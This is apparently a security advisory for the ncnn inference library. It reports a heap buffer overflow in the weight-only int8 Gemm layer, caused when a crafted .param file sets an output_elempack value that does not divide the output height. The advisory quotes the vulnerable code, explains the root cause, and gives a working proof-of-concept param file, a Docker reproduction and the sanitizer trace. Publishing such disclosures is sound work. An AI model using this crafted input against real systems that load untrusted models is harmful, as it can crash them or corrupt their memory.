Heap Buffer Overflow in Weight-Only Int8 GEMM
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/gemm_wq_int8.h:10868 in unpack_output_tile_wq_int8
Sanitizer verdict: heap-buffer-overflow
Summary
A crafted .param file that declares a weight-only int8 Gemm layer with an output_elempack that does not divide the output height makes ncnn allocate an output tensor several times smaller than the tile-unpacking code writes, producing a native heap out-of-bounds write that terminates the process. The entry point is any workflow that loads the parameter file through ncnn::Net::load_param(); the supplied PoC uses ncnnoptimize, which reaches the layer during ModelWriter::shape_inference(). No weight file is required — ncnnoptimize accepts the literal null bin path. The overflow writes attacker-influenced float data past the end of a pooled heap allocation.
Detail
The untrusted field is output_elempack, parameter id 12 of the Gemm layer. Gemm::load_param() reads it and validates only that it is not negative; there is no check that it divides the output height M, and no upper bound at all.
Gemm_x86::forward_wq_int8() then uses that raw value as the output packing factor and sizes the output tensor with the truncating division M / out_elempack. The tile unpacker, however, still walks all M logical rows, addressing them through out_hstep, which for a 2-D output is just top_blob.w:
// src/layer/gemm.cpp:262
output_elempack = pd.get(12, 0);
// src/layer/gemm.cpp:274
if (output_elempack < 0)
{
NCNN_LOGE("Gemm invalid output_elempack %d", output_elempack);
return -1;
}
// src/layer/x86/gemm_x86.cpp:9909
if (output_elempack)
out_elempack = output_elempack;
size_t out_elemsize = (output_elemtype == 1 ? 4u : 2u) * out_elempack;
// src/layer/x86/gemm_x86.cpp:9926
top_blob.create(N, M / out_elempack, out_elemsize, out_elempack, opt.blob_allocator);
// src/layer/x86/gemm_wq_int8.h:6600
const size_t out_hstep = top_blob.dims == 3 ? top_blob.cstep : (size_t)top_blob.w;
// src/layer/x86/gemm_wq_int8.h:6631
p0f = (float*)top_blob + (i + ii) * out_hstep + j * out_elempack;
// src/layer/x86/gemm_wq_int8.h:10866
else
{
p0f[0] = f00;
p0f[out_hstep] = f10;
p0f++;
}
The PoC declares M=63, N=1, K=32, output_elemtype=1, non-transposed output and output_elempack=32. M / out_elempack truncates 63/32 to 1, so top_blob.create(1, 1, 128, 32) reserves a single packed row — 32 floats, 128 bytes of payload, which ASan sees as the 196-byte region (128 bytes of data plus the reference count and ncnn's fixed over-read padding).
unpack_output_tile_wq_int8() is invoked with max_ii derived from the true M, so i + ii reaches 62 while out_hstep is top_blob.w == 1. The store pair p0f[0] = f00; p0f[out_hstep] = f10; at line 10868 therefore writes at float offsets far beyond the 32 floats that were allocated; ASan catches the write 44 bytes past the end of the region and aborts.
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-buffer-overflow-in-weight-only-int8-gemm && cd ncnn-poc-heap-buffer-overflow-in-weight-only-int8-gemm
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > poc.param <<'PARAM'
7767517
2 2
Input input 0 1 input 0=32 1=63
Gemm gemm 1 1 input output 3=1 5=1 8=1 9=32 12=32 18=800
PARAM
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0
AddressSanitizer output:
shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x512000000130 at pc 0x600d78f1f471 bp 0x7fff0c657070 sp 0x7fff0c657060
WRITE of size 4 at 0x512000000130 thread T0
#0 0x600d78f1f470 in unpack_output_tile_wq_int8 /ncnn/src/layer/x86/gemm_wq_int8.h:10868
#1 0x600d78f53e5b in gemm_BT_x86_wq_int8 /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:9692
#2 0x600d78f6d3c6 in ncnn::Gemm_x86_avx512::forward_wq_int8(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:9931
#3 0x600d78baab0e in ncnn::Gemm_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:7605
#4 0x600d724bd70b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
#5 0x600d724a5b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#6 0x600d725059e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#7 0x600d723973c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#8 0x600d72414eee in main /ncnn/tools/ncnnoptimize.cpp:2844
#9 0x7e9e2a1871c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#10 0x7e9e2a18728a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#11 0x600d72394624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
0x512000000130 is located 44 bytes after 196-byte region [0x512000000040,0x512000000104)
allocated by thread T0 here:
#0 0x7e9e2a800f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x600d7242968e in fastMalloc /ncnn/src/allocator.h:62
#2 0x600d7242968e in ncnn::PoolAllocator::fastMalloc(unsigned long) /ncnn/src/allocator.cpp:159
#3 0x600d724684b8 in ncnn::Mat::create(int, int, unsigned long, int, ncnn::Allocator*) /ncnn/src/mat.cpp:539
#4 0x600d78f6cfeb in ncnn::Gemm_x86_avx512::forward_wq_int8(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:9926
#5 0x600d78baab0e in ncnn::Gemm_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:7605
#6 0x600d724bd70b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
#7 0x600d724a5b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#8 0x600d725059e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#9 0x600d723973c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#10 0x600d72414eee in main /ncnn/tools/ncnnoptimize.cpp:2844
#11 0x7e9e2a1871c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#12 0x7e9e2a18728a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#13 0x600d72394624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
SUMMARY: AddressSanitizer: heap-buffer-overflow /ncnn/src/layer/x86/gemm_wq_int8.h:10868 in unpack_output_tile_wq_int8
Credit
Zheng Yu @ DepthFirst